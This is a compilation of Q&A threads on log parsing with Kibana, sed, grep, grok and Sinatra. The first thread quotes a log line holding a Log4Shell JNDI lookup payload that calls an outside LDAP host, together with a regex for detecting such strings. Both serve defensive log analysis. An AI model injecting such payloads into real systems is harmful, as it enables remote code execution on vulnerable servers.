Problem with using regex-based search in Kibana - elasticsearch

According to this post, I used the proposed regex \"?\$\{(?:jndi|lower|upper|env|sys|java|date|::-j)[^\s]*\" to find jndi signatures in the useragent field of web requests, but when run as a Lucene query it doesn't work. Please see the example below:
Example:
[27/Feb/2022:07:26:09 +0000] xxxx.xx.xx.xxx "-" "GET /xampp/cgi.cgi HTTP/1.1" 403 "-b" 0b 2ms "${jndi:ldap://log4shell-generic-W767eV31Ltd9L3OB6vXK${lower:ten}.w.nessus.org/nessus}" xxx.xx.xx.xxx 15638 "xxx.xxx.xx.xxx" "-" - - TLSv1.2 -,-,-
It doesn't work with or without quotation marks, and I even checked /.*n/ based on this source.
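As a quick sanity check outside Kibana, the pattern does match the sample line when tested with a PCRE-capable grep (the filename here is hypothetical):
# hypothetical check against a raw log file, outside Kibana
grep -P '"?\$\{(?:jndi|lower|upper|env|sys|java|date|::-j)[^\s]*' access.log
If that matches, the problem is likely on the Lucene side: Elasticsearch regexp queries are anchored to the whole term, so a query against an analyzed useragent field usually needs a keyword sub-field and leading/trailing .* in the Kibana regex.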

Related

Can't extract the filename from Apache logs

I have an ownCloud instance that I set up myself.
I need to log the files downloaded by users.
I made a bash script which greps the Apache logs and puts the matching lines into a file.
Example of a line in the file:
/var/log/httpd/ssl_access_log-20200621-46.63.46.133 - - [18/Jun/2020:13:07:33 +0000] "GET /ocs/v2.php/apps/files_sharing/api/v1/shares?format=json&path=%2FHJC%2FMaster-Schedule%20Draft%20for%20SOP%20of%20HJC%20(10.10.2019).xlsx&shared_with_me=true HTTP/1.1" 200 108
How can I get the file name "Master-Schedule Draft for SOP of HJC (10.10.2019).xlsx"?
OK. I finally found a solution using 'sed':
sed 's#+# #g;s#%#\\x#g' <my-log-file> | xargs -0 printf "%b" > <result-file>
It decodes the URL, so all that remains to be done is to extract the 'path' value.
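As a follow-up sketch, the file name can then be pulled out of the decoded line, assuming the decoded request still has another parameter after path= (as in the sample above):
# print whatever sits between the last '/' of the path value and the next '&'
sed -n 's/.*path=[^&]*\/\([^&]*\)&.*/\1/p' <result-file>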

Filter log file data from a certain time range

I want to write a script that asks the user for the start and end date/time of the interval to filter the log data by, and I need some help.
I don't know exactly how to find the data in that range, as I can't use a single regex.
My log file looks like this:
108.162.221.147 - - [04/Aug/2016:18:59:59 +0200] "GET / HTTP/1.1" 200 10254 "-"...
141.101.99.235 - - [04/Aug/2016:19:00:00 +0200] "GET / HTTP/1.1" 200 10255 ...
108.162.242.219 - - [04/Aug/2016:19:00:00 +0200] "GET / HTTP/1.1" 200 10255...
185.63.252.237 - - [04/Aug/2016:19:00:00 +0200] "CONNECT...
108.162.221.147 - - [04/Aug/2016:19:00:00 +0200] "GET /?...
185.63.252.237 - - [04/Aug/2016:19:00:01 +0200] "CONNECT....
etc...
My script:
#!/bin/bash
echo "enter the log file name "
read fname
echo "enter the start date and time "
read startdate
echo "enter the end fate and time "
read enddate
result=$(some code for filtering rows from this range)
echo "$result" > 'log_results'
echo "results written into /root/log_results file"
I tried using
sed -n "/"$startdate"/,/"$enddate"/p" "fname"
It didn't work, as sed couldn't see the date format because of the slashes; the regex approach doesn't work either, as it only finds lines with those two exact dates in the log (maybe I've been writing it wrong).
How do I do this?
Usually it's best to use some kind of dedicated log parsing software for this kind of task, so that you don't have to do what you're trying to do. It's also decidedly not a job for regular expressions. However, if you must do this with text processing tools such as grep, I would suggest a two-phase approach:
Generate a list of every timestamp you want to find.
Use grep -F to find all lines in your log that contain one of those timestamps.
For example, if you only wanted to find the middle five lines of your file (the ones with the timestamp [04/Aug/2016:19:00:00 +0200]), that would make step 1 very simple (as you are generating a single-item list, with just one timestamp in it).
echo '[04/Aug/2016:19:00:00 +0200]' > interesting_times
Then find all the lines with that timestamp:
grep -F -f interesting_times logfile
You could generate a shorter list by reducing the precision of the timestamp. For example to find two entire hours of log data:
echo '[04/Aug/2016:19' > interesting_times
echo '[04/Aug/2016:20' >> interesting_times
I leave it to you to determine how to generate the list of interesting times (one rough sketch follows below), but seriously look into purpose-built log parsing software.
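As an illustration only, here is a minimal sketch using GNU date, assuming $startdate and $enddate come from the script above in a format date -d understands (e.g. "2016-08-04 19:00"), and that minute precision is enough:
# emit one "[dd/Mon/yyyy:HH:MM" prefix per minute of the requested range
t="$startdate"
end_s=$(date -d "$enddate" +%s)
while [ "$(date -d "$t" +%s)" -le "$end_s" ]; do
  date -d "$t" '+[%d/%b/%Y:%H:%M' >> interesting_times
  t=$(date -d "$t 1 minute" '+%Y-%m-%d %H:%M')
done
grep -F -f interesting_times "$fname"
Since grep -F matches fixed substrings, each minute prefix matches every line logged in that minute, regardless of the seconds or the timezone suffix.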

logstash parsing IPv6 address

I am a newbie to logstash / grok patterns.
In my logfile I have a line in the following format:
::ffff:172.19.7.180 - - [10/Oct/2016:06:40:26 +0000] 1 "GET /authenticator/users HTTP/1.1" 200 7369
When I try a simple IP pattern match, %{IP}, using the grok constructor, it shows only a partial match:
after match: .19.7.180 - - [10/Oct/2016:06:33:58 +0000] 1 "POST /authenticator/searchUsers HTTP/1.1" 200 280
So only part of the IP address matched, as the 'after match' output still shows the remaining portion of the IP address.
Queries:
1. What format of IP address is ::ffff:172.19.7.180?
2. How can I resolve this issue and ensure the IP address is parsed correctly?
BTW, I am using the Node.js morgan logger middleware, which prints the IP address in this format.
Note that the log contains both IPv4 and IPv6 addresses separated by a colon, so the correct pattern you need to use is the following one:
%{IPV6:ipv6}:%{IPV4:ipv4}
Then in your event you'll have two fields:
"ipv6" => "::ffff"
"ipv4" => "172.19.7.180"
This will work until this issue is resolved.
These IP addresses are in the IPv4-embedded IPv6 format, which %{IP} doesn't match. The only way to go is to either use %{DATA} or write your own regex.
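For illustration, a minimal logstash filter sketch built around the split pattern from the first answer; the field names and the remainder of the line pattern are assumptions based on the sample log line:
filter {
  grok {
    # separate the IPv4-mapped prefix ("::ffff") from the embedded IPv4 address
    match => { "message" => "%{IPV6:ipv6}:%{IPV4:ipv4} - - \[%{HTTPDATE:timestamp}\] %{NUMBER:took} \"%{WORD:verb} %{URIPATHPARAM:request} HTTP/%{NUMBER:httpversion}\" %{NUMBER:response} %{NUMBER:bytes}" }
  }
}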

Sinatra not matching any URLs?

I'm trying to get Sinatra up and running with Ruby using some beginner tutorials. Sinatra works fine for '/' requests, but any path beyond that seems to break it and returns the error message 'Sinatra doesn’t know this ditty.' It doesn't seem to matter what I put in the '/xxx' part; it all fails.
Here's my code, config.ru:
require 'sinatra'

get '/' do
  "Root"
end

get "/hello" do
  "hello"
end
Here's what the server is saying:
127.0.0.1 - - [14/Oct/2014 20:20:53] "GET / HTTP/1.1" 200 10 0.0016
127.0.0.1 - - [14/Oct/2014 20:20:57] "GET /hello HTTP/1.1" 404 442 0.0010
127.0.0.1 - - [14/Oct/2014 20:20:57] "GET /__sinatra__/404.png HTTP/1.1" 304 - 0.0017
Thanks for any help!
A wild guess: your request URL might have a trailing slash.
Sinatra treats URLs with and without trailing slashes differently unless you append "/?" to the end of your route, like so:
get "/hello/?" do
'hello'
end
The route specified above will match both "/hello" and "/hello/".

Sinatra haml page is called twice

get '/test' do
  session[:my_session_id] = generate_random_id()
  puts 'begin haml debug'
  haml :"static/haml_page", :locals => { :session_id => session[:my_session_id] }
end
I can see in the log that the page above is consistently called twice:
begin haml debug
127.0.0.1 - - [02/Nov/2012 00:00:01] "GET / HTTP/1.1" 200 4317 1.5421
127.0.0.1 - - [02/Nov/2012 00:00:01] "GET /js/base/jquery.pjax.002902.js HTTP/1.1" 304 - 0.0234
[2012-11-02 00:00:01] WARN Could not determine content-length of response body. Set content-length of the response or set Response#chunked = true
127.0.0.1 - - [02/Nov/2012 00:00:01] "GET /css/docs.002902.css HTTP/1.1" 200 165 0.1086
.................................
begin haml debug
127.0.0.1 - - [02/Nov/2012 00:00:04] "GET / HTTP/1.1" 200 4317 1.9288
This causes some issues for me. Why is this happening?
I moved to the Puma server instead of WEBrick because of similar issues.
Unfortunately I've lost the example code that exhibited this problem.
In any case, if you have such problems, look at what the browser is doing:
The developer tools' Network tab will show the exact source of the request, if it exists.
Try to narrow the issue down by reducing the code, i.e. comment out all JavaScript, change the page contents to 'Hello World', and check whether the problem still happens.
Share your code :)
Sorry for posting here; I don't know how to post this as an addition to your question.
This is a hack, but if you really need the code to run only once:
Create a global boolean variable. In the route, wrap everything in a conditional on that boolean: if it's false, set it to true, run your code, and set it back to false again. A sketch follows below.
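A minimal Ruby sketch of that guard, reusing the route from the question (the flag name is hypothetical, and note that a global flag like this is not safe under concurrent requests):
# hack: global flag so the route body only runs for one request at a time
$already_running = false

get '/test' do
  unless $already_running
    $already_running = true
    session[:my_session_id] = generate_random_id()
    puts 'begin haml debug'
    page = haml :"static/haml_page", :locals => { :session_id => session[:my_session_id] }
    $already_running = false
    page
  end
end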
